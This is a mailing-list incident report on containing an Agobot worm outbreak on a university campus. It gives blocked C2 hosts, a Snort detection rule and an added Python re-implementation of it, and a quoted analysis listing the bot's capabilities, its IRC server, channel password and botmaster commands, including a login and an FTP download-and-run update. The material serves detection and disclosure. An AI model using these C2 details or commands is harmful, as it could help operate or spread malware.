
RE: [Full-Disclosure] Re: Outbreak of a virus on campus



  We have currently blocked connections to/from port 7000 on the
following hosts:

130.74.82.206
131.234.100.43
193.87.20.31

  This seems to have contained the spread of the worm within our campus. 
The list of hosts was gathered with a snort signature of:

alert tcp $HOME_NET any -> any 7000 (msg:"agobot IRC traffic";
content:"weednet";classtype:bad-unknown; sid:71727; rev:1;)

  Until the block was in place we had shut down around 50 hosts (mainly on
our dorm network) that had been infected with the worm.

  -Dave Hale
   Sr. Security Specialist
   Michigan Technological University
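
[Added example; this is not code from Dave Hale's post, from the quoted
reply, or from Snort.] The Python script below re-implements the rule above
over constructed flow records and derives the two lists the post talks
about: infected hosts inside HOME_NET and the 7000/tcp peers to block. It
also parses the JOIN-with-key and the 332 topic reply that the quoted reply
further down describes. Assumptions of mine, not stated in the thread:
192.0.2.0/24, 198.51.100.5 and 203.0.113.7 are documentation ranges standing
in for the campus network and for unrelated peers, and the reason an
outbound-only rule sees "weednet" is taken to be the client's PONG echo of
the server name.

```python
# Added example, not part of the original post or of Snort: the quoted rule
# re-implemented over constructed flow records, plus a parser for the IRC
# join/topic sequence the quoted reply describes.
import re
from dataclasses import dataclass
from ipaddress import ip_address, ip_network

# Assumption: an RFC 5737 documentation range stands in for the campus $HOME_NET.
HOME_NET = ip_network("192.0.2.0/24")
BOT_PORT = 7000
CONTENT = b"weednet"


@dataclass
class Flow:
    """One TCP connection with the bytes seen in each direction (constructed)."""
    src: str
    dst: str
    dport: int
    c2s: bytes   # what the internal host sent
    s2c: bytes   # what the server answered


def rule_matches(flow: Flow) -> bool:
    """Equivalent of: alert tcp $HOME_NET any -> any 7000 (content:"weednet";)
    The rule is stated for one direction only, so only client->server bytes
    are inspected; the server's own banner never triggers it."""
    return (ip_address(flow.src) in HOME_NET
            and flow.dport == BOT_PORT
            and CONTENT in flow.c2s)


def triage(flows):
    """Return (infected internal hosts, C2 servers to block) from matching flows."""
    infected, c2 = set(), set()
    for f in flows:
        if rule_matches(f):
            infected.add(f.src)
            c2.add(f.dst)
    return sorted(infected), sorted(c2)


JOIN_RE = re.compile(rb"^JOIN (?P<chan>#\S+)(?: (?P<key>\S+))?\r?$", re.M)
TOPIC_RE = re.compile(rb"^:\S+ 332 \S+ (?P<chan>#\S+) :(?P<topic>.*?)\r?$", re.M)


def c2_details(flow: Flow):
    """Extract channel, channel key and the topic the bot treats as a command."""
    join = JOIN_RE.search(flow.c2s)
    topic = TOPIC_RE.search(flow.s2c)
    return {
        "channel": join.group("chan").decode() if join else None,
        "key": join.group("key").decode() if join and join.group("key") else None,
        "topic_command": topic.group("topic").decode() if topic else None,
    }


# Constructed sample traffic. Assumption: the PONG is why the outbound rule
# fires, since IRC servers PING with their own name and clients echo it back.
SAMPLE_FLOWS = [
    Flow("192.0.2.17", "193.87.20.31", 7000,
         b"NICK [x]-12345\r\nUSER x 0 * :x\r\nPONG :irc.weednet.net\r\nJOIN #1337 heyho\r\n",
         b":irc.weednet.net 001 [x]-12345 :Welcome\r\n"
         b":irc.weednet.net 332 [x]-12345 #1337 :.scan.startall\r\n"),
    Flow("192.0.2.40", "193.87.20.31", 7000,
         b"NICK [y]-777\r\nPONG :irc.weednet.net\r\nJOIN #1337 heyho\r\n",
         b":irc.weednet.net 332 [y]-777 #1337 :.scan.startall\r\n"),
    # Legitimate IRC to another network on the same port: no match.
    Flow("192.0.2.9", "198.51.100.5", 7000,
         b"NICK bob\r\nPONG :irc.example.net\r\nJOIN #linux\r\n",
         b":irc.example.net 332 bob #linux :Welcome\r\n"),
    # Inbound connection from outside HOME_NET: the rule direction excludes it.
    Flow("203.0.113.7", "192.0.2.17", 7000,
         b"PONG :irc.weednet.net\r\n", b""),
]

if __name__ == "__main__":
    hosts, servers = triage(SAMPLE_FLOWS)
    print("infected hosts:", hosts)
    print("block tcp/7000 to/from:", servers)
    print("C2 details:", c2_details(SAMPLE_FLOWS[0]))
```

Two caveats worth keeping in mind when reusing this: the rule keys on a
server hostname and a fixed port, both of which the herder can change with a
single .ftp.update (the quoted reply shows the admin pushing exactly such an
update), so the host list is a snapshot rather than a durable detection; and
because the match is direction-bound, a bot whose first outbound line never
contains the server name is missed entirely.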

>
> ----- Original Message -----
> From: "Morning Wood"
> Date: Sat, 24 Apr 2004 18:37:31 +0000
> To: mueller@xxxxxxxxxx, full-disclosure@xxxxxxxxxxxxxxxx
> Subject: RE: [Full-Disclosure] Re: Outbreak of a virus on campus
>
>> phatbot?
>
> This one is yet another agobot. It has a long list of useful commands
> (included at the end of the posting, if someone is interested...),
> polymorphic capability, stealth capability - hides its own process
> in memory and its binary from listing, is capable of updating itself
> via ftp/http, has a list of servers for evaluating connection speed,
> steals cdkeys, sniffs the wire, performs ddos, is capable of installing
> a proxy, sends spam via aol, can install identd, has a LONG list of
> various processes to kill (mostly AV, but also regedit and tcpview
> among others), retrieves sysinfo, makes screenshots etc etc etc -
> looks similar to other good household bots :)
>
> What makes it interesting is its stealth capability and propagation.
> It has the following scanning/propagation subroutines:
>
> CScannerBagle
> CScannerBase
> CScannerDCOM
> CScannerDoom
> CScannerDW
> CScannerHTTP
> CScannerNetBios
> CScannerOptix
> CScannerSQL
> CScannerUPNP
> CScannerWKS
>
>
> When the worm is started, it connects to the irc server
> 193.87.20.31 (irc.weednet.net) port 7000.
> Then it joins the password-protected channel
> #1337; the password is heyho. As the channel topic is
> .scan.startall, it accepts the command and starts
> scanning right away.
>
> I took my trusty irc client and joined that
> channel myself. Right away the admin gave me these
> commands:
>
> <admin> .login stebo jamesbond007 -s
> <admin> .ftp.update ftp://ftp:bla@xxxxxxxxxxxxxxxxxxx/incoming/dt.exe
> %TEMP%\xgf.exeBLAOR12
> <admin> .scan.stop
> <admin> .ftp.update ftp://ftp:bla@xxxxxxxxxxxxxxxxxxx/incoming/dt.exe
> c:\xgf.exe BLAOR12
>
> seems like my 'bot' version was too old :)
>
> have fun :)
>
> W.
>
>
> -----------------------
> commands and parameters
> all commands start with . (dot)
>
>


_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html